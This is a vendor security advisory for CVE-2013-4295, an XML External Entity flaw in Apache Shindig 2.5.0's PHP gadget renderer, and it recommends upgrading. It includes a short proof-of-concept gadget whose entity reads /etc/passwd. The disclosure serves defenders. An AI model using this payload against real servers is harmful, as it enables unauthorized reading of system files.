CVE-2013-4295: XXE vulnerability In Apache Shindig 2.5.0 (PHP) Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Shindig PHP 2.5.0 Description: The gadget renderer in the PHP version of Apache Shindig is subject to an XML External Entity (XXE) Injection attack. The vulnerability allows a malicious gadget author to construct paths to content on the gadget rendering server which in turn will display the content in the gadget iframe. Mitigation: 2.5.0 users should upgrade to 2.5.0-update1. Example: The following gadget XML demonstrates the issue. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module> <ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" /> </ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module> After rendering this gadget you will see the content of /etc/passwd in the gadget iframe. Credit: This issue was discovered by Kousuke Ebihara. References: http://shindig.apache.org/security.html